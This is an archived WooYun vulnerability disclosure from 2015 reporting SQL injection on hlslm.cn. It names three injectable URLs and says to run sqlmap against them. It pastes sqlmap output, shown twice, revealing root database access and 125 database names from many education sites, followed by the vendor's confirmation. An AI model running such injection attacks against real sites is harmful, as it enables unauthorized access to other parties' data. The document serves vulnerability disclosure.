当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0135497

漏洞标题:好老师联盟几处sql注入漏洞打包(root注入涉及125裤)

相关厂商:hlslm.cn

漏洞作者: 牛 小 帅

提交时间:2015-08-20 10:18

修复时间:2015-10-04 11:50

公开时间:2015-10-04 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-20: 细节已通知厂商并且等待厂商处理中
2015-08-20: 厂商已经确认,细节仅向厂商公开
2015-08-30: 细节向核心白帽子及相关领域专家公开
2015-09-09: 细节向普通白帽子公开
2015-09-19: 细节向实习白帽子公开
2015-10-04: 细节向公众公开

简要描述:

又给我打包提交了

详细说明:

1.这个url可以注入
http://www.hlslm.cn/AboutMe/id/57/p_id/31/f_id/39
http://www.hlslm.cn/Content/uid/16863
http://www.hlslm.cn/AboutMe/id/35/p_id/30
2.直接丢sqlmap

[09:27:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:27:26] [INFO] fetching current user
current user:    'root@localhost'


available databases [125]:
[*] 021gaokao.com
[*] 16qianjin_2013
[*] 16qianjin_2013_2
[*] 21edu
[*] 21edu1
[*] 21edu2
[*] 21eedu
[*] 51qiuxue
[*] 52eedu
[*] 52qiuxue
[*] backup
[*] bbs_52qiuxue
[*] bbs_52qiuxue20150805
[*] bbs_52qiuxue_20150703
[*] bbs_52qiuxue_20150804
[*] bbs_52qiuxue_backup20150703
[*] bfdly.com
[*] bfdly.com_new
[*] bfdly_com
[*] ceqiuxue
[*] dedecmsv57utf8sp1
[*] destoon
[*] efyingyu.com
[*] gt.52qiuxue.com
[*] hangjinxue
[*] hdm0360223_db
[*] htlx.iacliuxue.net_new
[*] huatong.cliuxue.net
[*] huatong.iacliuxue.org
[*] huatongbefoundfcom
[*] huatongbefoundfcombak
[*] huatongbefoundfcombbak
[*] ihuatong.com
[*] information_schema
[*] jh.ydyjiajiao.org
[*] jinghan.zhilife.net
[*] jinghantj.com
[*] jingrui
[*] jingrui1v1.com
[*] jr.ydyfudao.com
[*] jztjy.cn
[*] luntan
[*] luntantest1011
[*] maisiling
[*] moban_huatong
[*] my021gaokao
[*] my97today
[*] mybtxueda
[*] mycdxueda
[*] mycqxueda
[*] myczxueda
[*] mydg-seiko
[*] mydgxueda
[*] mydlxueda
[*] myfsxueda
[*] myhhhtxueda
[*] myhuizxueda
[*] mymupingwang
[*] myncxueda
[*] mynjlvying
[*] mynnxueda
[*] myshjingh
[*] mysql
[*] mysql_log
[*] mysuzxueda
[*] mytyxueda
[*] mywinnetcap
[*] mywzxueda
[*] myxmxueda
[*] myxuedacs
[*] myxyxueda
[*] myytxueda
[*] nice
[*] njlvying.com
[*] novel
[*] phpcms
[*] ppc
[*] ppcall.befound.cn
[*] qdxueda.cn
[*] qiaowai
[*] qwiacliuxuenet
[*] ruisiyingyu.com
[*] sq_sinobm
[*] sunmax
[*] sunmaxtest
[*] szjuzhitang.com
[*] ultrax
[*] vip.befound.cn
[*] vzmer00376
[*] www.1v1buxi.net
[*] www.1v1buxi.org/huatong
[*] www.1v1buxi.org/zhongqing
[*] www.aicansi.com
[*] www.aicansi.com/huatong
[*] www.bf1v1.org
[*] www.bfdeu.com/zhongqing
[*] www.bfdeu.com/zhongqing2
[*] www.bliuxue.net
[*] www.cpbo.cn/huatong
[*] www.k12-edu.org/zhongqing
[*] www.libro.cn/huatong
[*] www.mupingwang.com
[*] www.qzj999.com/zhongqing
[*] www.sdfyme.com/huatong
[*] www.tzun.cn/zhongqing
[*] www.ydy114.org/huatong
[*] www_51fudao_org_xxq
[*] wwwchuguoyiminnet_qw
[*] wwwcnadicn_qw
[*] wwwedubuxnet
[*] wwwedupeixcom
[*] wwwedupeixcombak
[*] wwwgexingfudaonetjinghan
[*] wwwivcdcn_qiaowai
[*] wwwpcfmcn_qiaowai
[*] wwwssjzhcom_qiaowai
[*] xajuzhitang.com
[*] yuejiliuxue.com
[*] yzm_usercenter
[*] zgjhjy.zhilife.net
[*] zhishenghuo.org
[*] zjht.befoundg.com
[*] zjht.befoundg.com.bak
[*] zqsa
[*] zt00p1_db


[09:41:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:41:16] [INFO] fetching current user
[09:41:16] [INFO] retrieved:
[09:41:16] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[09:41:32] [INFO] adjusting time delay to 1 second due to good response times
root
[09:42:00] [ERROR] invalid character detected. retrying..
[09:42:00] [WARNING] increasing time delay to 2 seconds
@localhost
current user:    'root@localhost'


漏洞证明:

1.这个url可以注入
http://www.hlslm.cn/AboutMe/id/57/p_id/31/f_id/39
http://www.hlslm.cn/Content/uid/16863
http://www.hlslm.cn/AboutMe/id/35/p_id/30
2.直接丢sqlmap

[09:27:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:27:26] [INFO] fetching current user
current user:    'root@localhost'


available databases [125]:
[*] 021gaokao.com
[*] 16qianjin_2013
[*] 16qianjin_2013_2
[*] 21edu
[*] 21edu1
[*] 21edu2
[*] 21eedu
[*] 51qiuxue
[*] 52eedu
[*] 52qiuxue
[*] backup
[*] bbs_52qiuxue
[*] bbs_52qiuxue20150805
[*] bbs_52qiuxue_20150703
[*] bbs_52qiuxue_20150804
[*] bbs_52qiuxue_backup20150703
[*] bfdly.com
[*] bfdly.com_new
[*] bfdly_com
[*] ceqiuxue
[*] dedecmsv57utf8sp1
[*] destoon
[*] efyingyu.com
[*] gt.52qiuxue.com
[*] hangjinxue
[*] hdm0360223_db
[*] htlx.iacliuxue.net_new
[*] huatong.cliuxue.net
[*] huatong.iacliuxue.org
[*] huatongbefoundfcom
[*] huatongbefoundfcombak
[*] huatongbefoundfcombbak
[*] ihuatong.com
[*] information_schema
[*] jh.ydyjiajiao.org
[*] jinghan.zhilife.net
[*] jinghantj.com
[*] jingrui
[*] jingrui1v1.com
[*] jr.ydyfudao.com
[*] jztjy.cn
[*] luntan
[*] luntantest1011
[*] maisiling
[*] moban_huatong
[*] my021gaokao
[*] my97today
[*] mybtxueda
[*] mycdxueda
[*] mycqxueda
[*] myczxueda
[*] mydg-seiko
[*] mydgxueda
[*] mydlxueda
[*] myfsxueda
[*] myhhhtxueda
[*] myhuizxueda
[*] mymupingwang
[*] myncxueda
[*] mynjlvying
[*] mynnxueda
[*] myshjingh
[*] mysql
[*] mysql_log
[*] mysuzxueda
[*] mytyxueda
[*] mywinnetcap
[*] mywzxueda
[*] myxmxueda
[*] myxuedacs
[*] myxyxueda
[*] myytxueda
[*] nice
[*] njlvying.com
[*] novel
[*] phpcms
[*] ppc
[*] ppcall.befound.cn
[*] qdxueda.cn
[*] qiaowai
[*] qwiacliuxuenet
[*] ruisiyingyu.com
[*] sq_sinobm
[*] sunmax
[*] sunmaxtest
[*] szjuzhitang.com
[*] ultrax
[*] vip.befound.cn
[*] vzmer00376
[*] www.1v1buxi.net
[*] www.1v1buxi.org/huatong
[*] www.1v1buxi.org/zhongqing
[*] www.aicansi.com
[*] www.aicansi.com/huatong
[*] www.bf1v1.org
[*] www.bfdeu.com/zhongqing
[*] www.bfdeu.com/zhongqing2
[*] www.bliuxue.net
[*] www.cpbo.cn/huatong
[*] www.k12-edu.org/zhongqing
[*] www.libro.cn/huatong
[*] www.mupingwang.com
[*] www.qzj999.com/zhongqing
[*] www.sdfyme.com/huatong
[*] www.tzun.cn/zhongqing
[*] www.ydy114.org/huatong
[*] www_51fudao_org_xxq
[*] wwwchuguoyiminnet_qw
[*] wwwcnadicn_qw
[*] wwwedubuxnet
[*] wwwedupeixcom
[*] wwwedupeixcombak
[*] wwwgexingfudaonetjinghan
[*] wwwivcdcn_qiaowai
[*] wwwpcfmcn_qiaowai
[*] wwwssjzhcom_qiaowai
[*] xajuzhitang.com
[*] yuejiliuxue.com
[*] yzm_usercenter
[*] zgjhjy.zhilife.net
[*] zhishenghuo.org
[*] zjht.befoundg.com
[*] zjht.befoundg.com.bak
[*] zqsa
[*] zt00p1_db


[09:41:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[09:41:16] [INFO] fetching current user
[09:41:16] [INFO] retrieved:
[09:41:16] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based queries
[09:41:32] [INFO] adjusting time delay to 1 second due to good response times
root
[09:42:00] [ERROR] invalid character detected. retrying..
[09:42:00] [WARNING] increasing time delay to 2 seconds
@localhost
current user:    'root@localhost'


修复方案:

版权声明:转载请注明来源 牛 小 帅@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-08-20 11:48

厂商回复:

thanks

最新状态:

暂无